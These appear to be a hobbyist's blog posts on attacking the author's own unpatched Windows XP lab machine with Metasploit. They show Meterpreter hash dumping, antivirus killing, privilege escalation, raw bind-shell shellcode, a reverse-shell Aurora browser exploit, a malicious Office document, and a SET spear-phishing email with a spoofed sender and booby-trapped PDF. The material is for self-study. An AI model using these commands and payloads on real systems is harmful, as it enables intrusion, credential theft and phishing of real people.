This follows on from a previous post within which a target machine was exploited and a Meterpreter shell obtained. Details of the exploited machine are:

Windows XP Pro Service Pack 2 (unpatched). Firewall and software updates switched off, Microsoft Internet Information Services (IIS) (server) and FTP service enabled, SQL Server 2005 Express configured, and a vulnerable web app up and running.

I attempted to obtain the password hashes from the exploited system:

meterpreter > run hashdump
[*] Obtaining the boot key…
[*] Calculating the hboot key using SYSKEY ec2d41aa4579441e29ff2f7c166c0a22…
[*] Obtaining the user list and keys…
[-] Meterpreter Exception: Rex::Post::Meterpreter::RequestError stdapi_registry_query_value: Operation failed: The handle is invalid.
[-] This script requires the use of a SYSTEM user context (hint: migrate into service process)

But this failed and hinted that I should migrate into service process, which I did:

meterpreter > run post/windows/manage/migrate

[*] Running module against LAB
[*] Current server process: ALqkE.exe (3740)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3672
[+] Successfully migrated to process 3672

After which run hashdump worked perfectly.

I have blogged on obtaining the password hashes previously.

This follows on from a previous post within which a target machine was exploited and a Meterpreter shell obtained. Details of the exploited machine are:

Windows XP Pro Service Pack 2 (unpatched). Firewall and software updates switched off, Microsoft Internet Information Services (IIS) (server) and FTP service enabled, SQL Server 2005 Express configured, and a vulnerable web app up and running.

The following disables most antivirus programs:

meterpreter > run killav
[*] Killing Antivirus services on the target…
meterpreter >

Simple as that.

This follows on from a previous post within which a target machine was exploited and a Meterpreter shell obtained. Details of the exploited machine are:

Windows XP Pro Service Pack 2 (unpatched). Firewall and software updates switched off, Microsoft Internet Information Services (IIS) (server) and FTP service enabled, SQL Server 2005 Express configured, and a vulnerable web app up and running.

Great way to view Meterpreter post exploitation modules is: “run post/” followed by the tab key:

meterpreter > run post/
Display all 144 possibilities? (y or n)
run post/multi/gather/apple_ios_backup
run post/multi/gather/dns_bruteforce
run post/multi/gather/dns_reverse_lookup
run post/multi/gather/dns_srv_lookup
run post/multi/gather/enum_vbox
run post/multi/gather/env
run post/multi/gather/filezilla_client_cred
run post/multi/gather/find_vmx
run post/multi/gather/firefox_creds
run post/multi/gather/multi_command
run post/multi/gather/pgpass_creds
run post/multi/gather/pidgin_cred
run post/multi/gather/ping_sweep
run post/multi/gather/run_console_rc_file
run post/multi/gather/skype_enum
run post/multi/gather/thunderbird_creds
run post/multi/general/close
run post/multi/general/execute
run post/multi/manage/multi_post
run post/multi/manage/record_mic
run post/windows/capture/keylog_recorder
run post/windows/capture/lockout_keylogger
run post/windows/escalate/bypassuac
–More–

Metasploit: The Penetration Tester’s Guide has this to say about Railgun:

You can interface with the Windows native API directly through a Metasploit add-on called Railgun.

[....]

Railgun gives you the same capabilities as a native Win32 application with full access to the Windows API.

Here’s Wiki on Native API:

The Native API (with capitalized N) is the mostly undocumented application programming interface (API) used internally by the Windows NT family of operating systems produced by Microsoft.^[1] It is predominately used during system boot, when other components of Windows are unavailable, and by routines such as those in kernel32.dll that implement the Windows API. The program entry point is called DriverEntry(), the same as for a Windows device driver. However, the application runs in ring 3 the same as a regular Windows application. Most of the Native API calls are implemented in ntoskrnl.exe and are exposed to user mode by ntdll.dll. Some Native API calls are implemented in user mode directly within ntdll.dll.

While most of Microsoft Windows is implemented using the documented and well-defined Windows API, a few components, such as the Client/Server Runtime Subsystem, are implemented using the Native API, as they can be started earlier in the Windows NT Startup Process when the Windows API is not yet available.

Some malware make use of the Native API to hide their presence from malware detection software.

Railgun operates through an Interactive Ruby Shell within Meterpreter which is cool as I’m learning Ruby. I followed instructions given in the above book to create a pop-up on an exploited Windows machine which calls the user32.dll and MessageBoxA function.

Details of the exploited machine are:

Windows XP Pro Service Pack 2 (unpatched). Firewall and software updates switched off, Microsoft Internet Information Services (IIS) (server) and FTP service enabled, SQL Server 2005 Express configured, and a vulnerable web app up and running.

And in the terminal:

meterpreter > irb
[*] Starting IRB shell
[*] The ‘client’ variable holds the meterpreter client

>> client.railgun.user32.MessageBoxA(0,”hello”,”world”,”MB_OK”)

I took a screenshot from Meterpreter:

And you can see the pop-up box on the exploited machine. The above book describes the power and implication of Railgun as huge, but them covers no further details and suggests reading the Framework tutorial. I think this is something I will have to return to once I’ve learned the basics of Metasploit.

In the meantime, this video was informative:

I’m following instruction given in Metasploit: The Penetration Tester’s Guide - Chapter 8 (Exploitation Using Client-Side Attacks).

It’s worth watching this excellent video which demonstrates the process I describe below:

First I download Immunity Debugger onto the Windows portion of my Virtual Hacking Lab.

Next to create the shellcode in Metasploit – I used port 446 as I initially struggled with port 443:

~# msfpayload windows/shell/bind_tcp LPORT=446 C
/*
* windows/shell/bind_tcp – 298 bytes (stage 1)
* http://www.metasploit.com
* VERBOSE=false, LPORT=446, RHOST=, EnableStageEncoding=false,
* PrependMigrate=false, EXITFUNC=process,
* InitialAutoRunScript=, AutoRunScript=
*/
unsigned char buf[] =
“\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30″
“\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff”
“\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2″
“\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85″
“\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3″
“\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d”
“\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58″
“\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b”
“\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff”
“\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68″
“\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01″
“\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50″
“\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x31″
“\xdb\x53\x68\x02\x00\x01\xbe\x89\xe6\x6a\x10\x56\x57\x68\xc2″
“\xdb\x37\x67\xff\xd5\x53\x57\x68\xb7\xe9\x38\xff\xff\xd5\x53″
“\x53\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57\x97\x68\x75\x6e\x4d”
“\x61\xff\xd5\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff”
“\xd5\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58″
“\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9″
“\xc8\x5f\xff\xd5\x01\xc3\x29\xc6\x85\xf6\x75\xec\xc3″;

/*
* windows/shell/bind_tcp – 240 bytes (stage 2)
* http://www.metasploit.com
*/
unsigned char buf[] =
“\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30″
“\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff”
“\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2″
“\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85″
“\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3″
“\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d”
“\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58″
“\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b”
“\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff”
“\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x63\x6d\x64\x00\x89″
“\xe3\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44″
“\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56″
“\x56\x46\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5″
“\x89\xe0\x4e\x56\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb”
“\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a”
“\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5″;

I’m only interested in the “Stage 1″ code to which I add a few \x90 at the beginning, which in Intel x86 Assembly Language is a no-operation instruction - NOP . I then remove all ” /x occurrences and am left with:

909090909090909090909090909090
909090909090909090909090909090
909090909090909090909090909090
fce8890000006089e531d2648b5230
8b520c8b52148b72280fb74a2631ff
31c0ac3c617c022c20c1cf0d01c7e2
f052578b52108b423c01d08b407885
c0744a01d0508b48188b582001d3e3
3c498b348b01d631ff31c0acc1cf0d
01c738e075f4037df83b7d2475e258
8b582401d3668b0c4b8b581c01d38b
048b01d0894424245b5b61595a51ff
e0585f5a8b12eb865d683332000068
7773325f54684c772607ffd5b89001
000029c454506829806b00ffd55050
50504050405068ea0fdfe0ffd59731
db5368020001be89e66a10565768c2
db3767ffd5535768b7e938ffffd553
53576874ec3be1ffd5579768756e4d
61ffd56a006a0456576802d9c85fff
d58b366a406800100000566a006858
a453e5ffd593536a005653576802d9
c85fffd501c329c685f675ecc3

I then open Immunity Debugger (ID) on the target machine and open iexplore.exe.

In the main ID screen I paste in the above code and create breaks at the start and end of my code.

I then ran the exploit in Metasploit on the attacking machine to see if I could bind with port 446:

msf > use multi/handler
msf exploit(handler) > set payload windows/shell/bind_tcp
payload => windows/shell/bind_tcp
msf exploit(handler) > set LPORT 446
LPORT => 446
msf exploit(handler) > set RHOST 192.168.1.79
RHOST => 192.168.1.79
msf exploit(handler) > exploit

[*] Started bind handler
[*] Starting the payload handler…
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 192.168.1.79
[*] Command shell session 1 opened (192.168.1.70:39979 -> 192.168.1.79:446) at 2013-07-10 10:14:46 +0100

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Program Files\Internet Explorer>

And as you can see the connection was duly established.

I’m following instruction given in Metasploit: The Penetration Tester’s Guide - Chapter 8 (Exploitation Using Client-Side Attacks).

Details of the target machine on my Virtual Hacking Lab:

Windows XP Pro Service Pack 2 (unpatched). Firewall and software updates switched off, Microsoft Internet Information Services (IIS) (server) and FTP service enabled, SQL Server 2005 Express configured, and a vulnerable web app up and running.

Metasploit describe this exploit thus:

This module exploits a memory corruption flaw in Internet Explorer. This flaw was found in the wild and was a key component of the “Operation Aurora” attacks that lead to the compromise of a number of high profile companies. The exploit code is a direct port of the public sample published to the Wepawet malware analysis site. The technique used by this module is currently identical to the public sample, as such, only Internet Explorer 6 can be reliably exploited.

This is my first client-side exploit and I must say I rather enjoyed it.

Firstly to Metasploit to set up the exploit:

msf > use windows/browser/ms10_002_aurora
msf exploit(ms10_002_aurora) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms10_002_aurora) > set SRVPORT 80
SRVPORT => 80
msf exploit(ms10_002_aurora) > set URIPATH /
URIPATH => /
msf exploit(ms10_002_aurora) > set LHOST 192.168.1.70 <– This is my IP (The attacking machine)
LHOST => 192.168.1.70
msf exploit(ms10_002_aurora) > set LPORT 443
LPORT => 443
msf exploit(ms10_002_aurora) > exploit -z
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.1.70:443
[*] Using URL: http://0.0.0.0:80/

[*] Local IP: http://192.168.1.70:80/
[*] Server started.

Then I opened Internet Explorer on the target Windows system and entered the IP of the attacking machine in the browser.

At the same time I opened the Task Manager and watched the memory usage for iexplore.exe jump from 3-5,000K to over 300,000K as the exploit filled the heap.

Back to the attacking machine and Metasploit:

msf exploit(ms10_002_aurora) > [*] 192.168.1.79 ms10_002_aurora – Sending Internet Explorer “Aurora” Memory Corruption
[*] Sending stage (751104 bytes) to 192.168.1.79
[*] Meterpreter session 1 opened (192.168.1.70:443 -> 192.168.1.79:1115) at 2013-07-19 14:53:29 +0100

msf exploit(ms10_002_aurora) >

I then wanted a Meterpreter shell:

msf exploit(ms10_002_aurora) > sessions -i 1
[*] Starting interaction with 1…

meterpreter >

I took a screenshot of the victim machine:

meterpreter > screenshot

I then wanted to escalate my privileges:

meterpreter > getsystem
…got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

I thought I’d best migrate the process in case Explorer was shut down:

meterpreter > run post/windows/manage/migrate

[*] Running module against LAB
[*] Current server process: IEXPLORE.EXE (3156)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 2720
[+] Successfully migrated to process 2720
meterpreter >

Job done and good fun.

I’m following instruction given in Metasploit: The Penetration Tester’s Guide - Chapter 8 (Exploitation Using Client-Side Attacks).

Details of the target machine on my Virtual Hacking Lab:

Windows XP Pro Service Pack 2 (unpatched). Firewall and software updates switched off, Microsoft Internet Information Services (IIS) (server) and FTP service enabled, SQL Server 2005 Express configured, and a vulnerable web app up and running.

Metasploit describe this exploit thus:

This module exploits a stack-based buffer overflow in the handling of thumbnails within .MIC files and various Office documents. When processing a thumbnail bitmap containing a negative ‘biClrUsed’ value, a stack-based buffer overflow occurs. This leads to arbitrary code execution. In order to trigger the vulnerable code, the folder containing the document must be viewed using the “Thumbnails” view.

The first step is to create the malicious document within Metasploit:

msf > use windows/fileformat/ms11_006_createsizeddibsection
msf exploit(ms11_006_createsizeddibsection) > set outputpath /root/ <– I changed the output directory as the original one didn’t exist.
outputpath => /root/
msf exploit(ms11_006_createsizeddibsection) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms11_006_createsizeddibsection) > set LHOST 192.168.1.70 <– Attacking machine.
LHOST => 192.168.1.70
msf exploit(ms11_006_createsizeddibsection) > set LPORT 447 <– Attacking machine port.
LPORT => 447
msf exploit(ms11_006_createsizeddibsection) > exploit

[*] Creating ‘msf.doc’ file …
[*] Generated output file /root/msf.doc <– File created.

I then emailed as an attachment the created “malicious” file to open on the target Windows machine. I was very impressed with Google Gmail as it rejected the email and noted:

Our system detected an illegal attachment on your message

So, I had to send the file via another web based mail system.

Before opening the file on the target Windows system, I needed to set up the attacking machine to listen for incoming connections from the target machine:

msf exploit(ms11_006_createsizeddibsection) > use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.70
LHOST => 192.168.1.70
msf exploit(handler) > set LPORT 447
LPORT => 447
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.1.70:447
[*] Starting the payload handler…

I then opened the malicious file on the target machine and viewed as a thumbnail in the hope it would trigger the exploit; however, nothing happened, and the hack failed.

Microsoft list the Windows versions affected by this exploit and my x32 XP Pro SP2 is not listed, so perhaps this is the reason the exploit failed. The above book states the Windows system should be SP3, which mine is not.

A little disappointed.

Anyway, here’s a nice step-by-step guide to this exploit.

And this video, may or may not be useful:

Chapter nine of Metasploit: The Penetration Tester’s Guide moves into auxiliary modules. Here’s a snippet from the book:

In addition to providing valuable tools such as port scanners and service fingerprints, auxiliary modules such as ssh_login can take a known list of usernames and passwords and then attempt to log in via brute force across an entire network. Also included in the auxiliary modules are various protocol fuzzers such as ftp_pre_post, http_get_uri, smtp_fuzzer, ssh_version_corrupt and more. You can launch these fuzzers at a target service in hopes of finding your own vulnerabilities to exploit.

We can list all the auxiliary modules available:

msf > show auxiliary

Auxiliary
=========

Name Disclosure Date Rank Description
—- ————— —- ———–
admin/2wire/xslt_password_reset 2007-08-15 normal 2Wire Cross-Site Request Forgery Password Reset Vulnerability
admin/backupexec/dump normal Veritas Backup Exec Windows Remote File Access
admin/backupexec/registry normal Veritas Backup Exec Server Registry Access
admin/cisco/cisco_secure_acs_bypass normal Cisco Secure ACS Version < 5.1.0.44.5 or 5.2.0.26.2 Unauthorized Password Change
admin/cisco/vpn_3000_ftp_bypass 2006-08-23 normal Cisco VPN Concentrator 3000 FTP Unauthorized Administrative Access
admin/db2/db2rcmd 2004-03-04 normal IBM DB2 db2rcmd.exe Command Execution Vulnerability
admin/edirectory/edirectory_dhost_cookie normal Novell eDirectory DHOST Predictable Session Cookie
admin/edirectory/edirectory_edirutil normal Novell eDirectory eMBox Unauthenticated File Access
admin/emc/alphastor_devicemanager_exec 2008-05-27 normal EMC AlphaStor Device Manager Arbitrary Command Execution
admin/emc/alphastor_librarymanager_exec 2008-05-27 normal EMC AlphaStor Library Manager Arbitrary Command Execution
admin/hp/hp_data_protector_cmd 2011-02-07 normal HP Data Protector 6.1 EXEC_CMD Command Execution
admin/http/axigen_file_access 2012-10-31 normal Axigen Arbitrary File Read and Delete
admin/http/contentkeeper_fileaccess normal ContentKeeper Web Appliance mimencode File Access
admin/http/dlink_dir_300_600_exec_noauth 2013-02-04 normal D-Link DIR-600 / DIR-300 Unauthenticated Remote Command Execution
admin/http/dlink_dir_645_password_extractor normal DLink DIR 645 Password Extractor
admin/http/dlink_dsl320b_password_extractor normal DLink DSL 320B Password Extractor
admin/http/hp_web_jetadmin_exec 2004-04-27 normal HP Web JetAdmin 6.5 Server Arbitrary Command Execution
admin/http/iis_auth_bypass 2010-07-02 normal MS10-065 Microsoft IIS 5 NTFS Stream Authentication Bypass
admin/http/intersil_pass_reset

And so on…..

Here’s my first use of an auxiliary module against my virtual hacking lab:

msf > use scanner/http/webdav_scanner
msf auxiliary(webdav_scanner) > info

Name: HTTP WebDAV Scanner
Module: auxiliary/scanner/http/webdav_scanner
Version: 0
License: Metasploit Framework License (BSD)
Rank: Normal

Provided by:
et <et@metasploit.com>

Basic options:
Name Current Setting Required Description
—- ————— ——– ———–
PATH / yes Path to use
Proxies no Use a proxy chain
RHOSTS yes The target address range or CIDR identifier
RPORT 80 yes The target port
THREADS 1 yes The number of concurrent threads
VHOST no HTTP server virtual host

Description:
Detect webservers with WebDAV enabled

msf auxiliary(webdav_scanner) > set RHOSTS 192.168.1.79
RHOSTS => 192.168.1.79
msf auxiliary(webdav_scanner) > run

[+] 192.168.1.79 (Microsoft-IIS/5.1) has WEBDAV ENABLED
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(webdav_scanner) >

This auxiliary module simply detects webservers with WebDAV enabled, which it is in this instance.

Chapter ten of Metasploit: The Penetration Tester’s Guide moves into Social Engineering, which is a topic I’ve yet to explore. It transpires that one of the author’s of the above book – David “SacMan” Kennedy – developed the Social-Engineer Toolkit (SET) to coincide with the release of Social-Engineer.org.

The site offers a centralised location for social-engineering tutorials and explains terminologies, definitions, and scenarios that can help you prepare for hacking the human mind.

I like the website’s reference to exploiting the “HumanOS”

Here’s a snippet from the above book relating to SET:

The purpose of SET is to fill a gap in the penetration testing community and bring awareness to social-engineering attacks. And it has succeeded – SET has been downloaded 1 million times and is now an industry standard for deploying social-engineering attacks. The toolkit attacks human weakness, exploiting curiosity, credibility, avarice, and simple human stupidity. Social-engineering attacks are at an all-time high and have always been a large risk for many organisations.

Backtrack and Kali Linux come with SET as default. In Kali you can find SET in “Exploitation Tools”.

This post follows instructions given in chapter ten (The Social-Engineer Toolkit) of Metasploit: The Penetration Tester’s Guide, Previous post here.

Here’s what we’re greeted with in the terminal on starting The Social-Engineer Toolkit (SET):

Select from the menu:

1) Social-Engineering Attacks
2) Fast-Track Penetration Testing
3) Third Party Modules
4) Update the Metasploit Framework
5) Update the Social-Engineer Toolkit
6) Update SET configuration
7) Help, Credits, and About

99) Exit the Social-Engineer Toolkit

We’ll select one and are shown the below:

Select from the menu:

1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) SMS Spoofing Attack Vector
8) Wireless Access Point Attack Vector
9) QRCode Generator Attack Vector
10) Powershell Attack Vectors
11) Third Party Modules

99) Return back to the main menu.

And select one again.

The Spearphishing module allows you to specially craft email messages and send
them to a large (or small) number of people with attached fileformat malicious
payloads. If you want to spoof your email address, be sure “Sendmail” is in-
stalled (apt-get install sendmail) and change the config/set_config SENDMAIL=OFF
flag to SENDMAIL=ON.

There are two options, one is getting your feet wet and letting SET do
everything for you (option 1), the second is to create your own FileFormat
payload and use it in your own attack. Either way, good luck and enjoy!

1) Perform a Mass Email Attack
2) Create a FileFormat Payload
3) Create a Social-Engineering Template

99) Return to Main Menu

We’ll select one again:

Select the file format exploit you want.
The default is the PDF embedded EXE.

********** PAYLOADS **********

1) SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP)
2) SET Custom Written Document UNC LM SMB Capture Attack
3) Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow
4) Microsoft Word RTF pFragments Stack Buffer Overflow (MS10-087)
5) Adobe Flash Player “Button” Remote Code Execution
6) Adobe CoolType SING Table “uniqueName” Overflow
7) Adobe Flash Player “newfunction” Invalid Pointer Use
8) Adobe Collab.collectEmailInfo Buffer Overflow
9) Adobe Collab.getIcon Buffer Overflow
10) Adobe JBIG2Decode Memory Corruption Exploit
11) Adobe PDF Embedded EXE Social Engineering
12) Adobe util.printf() Buffer Overflow
13) Custom EXE to VBA (sent via RAR) (RAR required)
14) Adobe U3D CLODProgressiveMeshDeclaration Array Overrun
15) Adobe PDF Embedded EXE Social Engineering (NOJS)
16) Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow
17) Apple QuickTime PICT PnSize Buffer Overflow
18) Nuance PDF Reader v6.0 Launch Stack Buffer Overflow
19) Adobe Reader u3D Memory Corruption Vulnerability
20) MSCOMCTL ActiveX Buffer Overflow (ms12-027)

We’ll select eight which is a heap-based exploit.

1) Windows Reverse TCP Shell Spawn a command shell on victim and send back to attacker
2) Windows Meterpreter Reverse_TCP Spawn a meterpreter shell on victim and send back to attacker
3) Windows Reverse VNC DLL Spawn a VNC server on victim and send back to attacker
4) Windows Reverse TCP Shell (x64) Windows X64 Command Shell, Reverse TCP Inline
5) Windows Meterpreter Reverse_TCP (X64) Connect back to the attacker (Windows x64), Meterpreter
6) Windows Shell Bind_TCP (X64) Execute payload and create an accepting port on remote system
7) Windows Meterpreter Reverse HTTPS Tunnel communication over HTTP using SSL and use Meterpreter

And now number two:

set:payloads>2
set> IP address for the payload listener: 192.168.1.70 <– Enter attacking IP address
set:payloads> Port to connect back on [443]: <– Enter attacking listening port
[-] Defaulting to port 443…
[-] Generating fileformat exploit…
[*] Payload creation complete.
[*] All payloads get sent to the /root/.set/template.pdf directory
[-] As an added bonus, use the file-format creator in SET to create your attachment.

Right now the attachment will be imported with filename of ‘template.whatever’

Do you want to rename the file?

example Enter the new filename: moo.pdf

1. Keep the filename, I don’t care.
2. Rename the file, I want to be cool.

We’ll keep the default filename by entering one.

Keeping the filename and moving on.

Social Engineer Toolkit Mass E-Mailer

There are two options on the mass e-mailer, the first would
be to send an email to one individual person. The second option
will allow you to import a list and send it to as many people as
you want within that list.

What do you want to do:

1. E-Mail Attack Single Email Address
2. E-Mail Attack Mass Mailer

99. Return to main menu.

We’ll select one:

Do you want to use a predefined template or craft
a one time email template.

1. Pre-Defined Template
2. One-Time Use Email Template

And select one again:

Available templates:
1: Baby Pics
2: Order Confirmation
3: Status Report
4: How long has it been?
5: Dan Brown’s Angels & Demons
6: New Update
7: Computer Issue
8: Strange internet usage from your computer
9: WOAAAA!!!!!!!!!! This is crazy…
10: Have you seen this?

We’ll go for option three:

Send email to: Enter target email address

I’m going to send this to one of my web based email accounts:

1. Use a gmail Account for your email attack.
2. Use your own server or open relay

I originally selected option one, but Gmail (and all my other web based emails) kept refusing the connection as the email had a potentially dangerous attachment and so was forced to use option two and use my server based email address.

set:phishing>2
set:phishing> From address (ex: moo@example.com):My email address
set:phishing> The FROM NAME user will see: :Make up a name
set:phishing> Username for open-relay [blank]:My server based email address
Password for open-relay [blank]: Password for server email
set:phishing> SMTP email server address (ex. smtp.youremailserveryouown.com): Email server address
set:phishing> Port number for the SMTP server [25]: Outgoing server email port number
set:phishing> Flag this message/s as high priority? [yes|no]:y
[*] SET has finished delivering the emails

At this point I checked my “target” email account and an email had duly arrived entitled “Status Report” and a PDF attachment, simply entitled “Template”.

Interestingly, I tried to reply to the “sender” but the email address was not available, which is rather handy for stealth.

I opened the pdf attachment out of curiosity and it appeared blank, but it must somehow set off the buffer overflow and and in the process connect to the attacking machine.

Meanwhile, in the terminal I was asked:

set:phishing> Setup a listener [yes|no]:y

Which consequently activated Metasploit:

[*] Processing /root/.set/meta_config for ERB directives.
resource (/root/.set/meta_config)> use exploit/multi/handler
resource (/root/.set/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (/root/.set/meta_config)> set LHOST 192.168.1.70
LHOST => 192.168.1.70
resource (/root/.set/meta_config)> set LPORT 443
LPORT => 443
resource (/root/.set/meta_config)> set ENCODING shikata_ga_nai
ENCODING => shikata_ga_nai
resource (/root/.set/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (/root/.set/meta_config)> exploit -j
[*] Exploit running as background job.
msf exploit(handler) >
[*] Started reverse handler on 192.168.1.70:443
[*] Starting the payload handler…

It would have been rather satisfying to see this exploit complete, but that’s as far as I can go for the moment.

A short while ago I briefly mentioned the IP packet manipulation tool Scapy. I started reading Adam’s guide and noted this tool is written in Python. I then had the bright idea of finding an equivalent tool written in Ruby; the idea being that I would learn the tool itself whilst peeking under the bonnet to enhance my knowledge of Ruby.

I found a tool called PacketFu which is written in Ruby and bundled with Metasploit, but I wanted an install of this tool separate to Metasploit, so I could learn it, and the Ruby code independently.

Thus began three days of absolute hair-pulling frustration as I tried to achieve this goal. In the end I became so absolutely determined to install PacketFu that I re-loaded my entire Kali Linux OS in the process.

I have now installed PacketFu and thought I would detail the process in order to save others endless hours of futility.

I installed PacketFu via Ruby Gems, but before this we need the pcaprub Gem; however, I kept getting this error message:

pcaprub.c:8:18: fatal error: pcap.h No such file or directory compilation terminated

I realised this was an issue with libpcap and after confirming I had a recent version (1.3.0-1) and trying everything you can imagine, I hit the Synaptic Packet Manager and basically selected for installation anything connected with libpcap and Ruby:

libpcapnav0

libpcap-ruby

ruby-pcap

libpcapnav0-dev

libpcap0.8-dev

libpcap0.8

The truth is, I don’t know which one of these installs did the job, but one of them did, as when I went back to the Terminal and input “gem install pcaprub” it worked like a charm.

UPDATE: Having just repeated the process it would appear that libpcap0.8-dev is the software needed for pcabrub installation.

Then came “gem install packetfu” and I checked the installation with these commands in the Terminal:

~# cd /var/lib/gems/1.9.1/gems/packetfu-1.1.8/examples

/var/lib/gems/1.9.1/gems/packetfu-1.1.8/examples# ruby packetfu-shell.rb

And was finally rewarded with:

Underneath this you should see something like:

>>> Use $packetfu_default.config for salient networking details.
IP: 192.168.1.100 Mac: 00:1d:e0:54:2f:7e Gateway: 00:03:2f:32:a5:3c Net: 192.168.1.0 Iface: wlan0
>>> Packet capturing/injecting enabled.

If you don’t see this underneath the banner, something is wrong, and from my experience it’s connected with pcaprub not being properly installed.

I found all of the documentation for PacketFu within the following folder:

/var/lib/gems/1.9.1/doc/packetfu-1.1.8/rdoc

Just hit one of the HTML docs which should open in a browser for you. Alternatively you can find all the PacketFu documentation online here.

Now to learn.

Hope this helps.

It’s three months since I wrote my last “Where I’m at” post.

I must admit this cyber security hobby is something of a time vampire and extremely addictive. Here’s a breakdown of where I find myself currently:

Just upgraded to a Ruby Programming book known in the community as the “PickAxe” entitled: Programming Ruby 1.9 & 2.0 The Pragmatic Programmers’ Guide. This is the latest version of the book and I aim to run Ruby 2.0 in an RVM for the time being.

I’m attempting to get my hands on a cheap laptop from which to run Security Onion on a network tap, to learn about intrusion detection and make more use of Wireshark.

I want to explore packets at a deeper level and so have (finally) installed PacketFu which is a packet manipulation tool similar to Scapy but written in Ruby, which should also help with programming progress.

I shall continue working with the Open Web Application Security Project (OWASP) Broken Web Applications Project (owaspbwa) and hopefully learn more on Web Application security .

For light relief, I’m going all script kiddie and want to make use of Metasploit’s GUI Armitage and Nmap’s Zenmap. I’ve done quite a bit through the command prompt on both tools and need something more fun and visuals.

I’ve come a long way in three months, but haven’t reached the foot of the mountain.

That’s where I’m at.

My success with installing PacketFu was short-lived. I updated Metasploit and it broke. I updated the system and it broke. I closed the computer and it broke. That’s it, even my patience has limits.

The alternative Ruby Packet manipulation software appears to be Racket. As with PacketFu I believe it is (or was) bundled with Metasploit. I tried installing Racket (and Scruby and RubyForger) and it failed. I just happened to notice a comment written on the blog of the guy who coded Racket which said:

I realize I’m a bit behind the times here with my comment but I got the same error. I was able to solve it by switching my ruby version back to 1.8.7 … yayyy for RVM.

And so began my journey into the world of Ruby Version Manager (RVM). Put simply this allows us to run different version of Ruby. As I have Ruby version 1.9.3 I needed an RVM running version 1.8.7.

I installed RVM with this in script in the Command Prompt:

\curl -L https://get.rvm.io | bash -s stable

Then to test the installation in the Terminal:

source /usr/local/rvm/scripts/rvm <– This puts us in the RVM environment.

type rvm | head -n 1

 rvm is a function

The “rvm is a function” confirms RVM is installed and working.

Next step was to have Ruby version 1.8.7 running in RVM:

rvm install 1.8.7

Now we need to install the Gem in the RVM

source /usr/local/rvm/scripts/rvm

Gem Install Racket

And it’s loaded, now to check the install works.

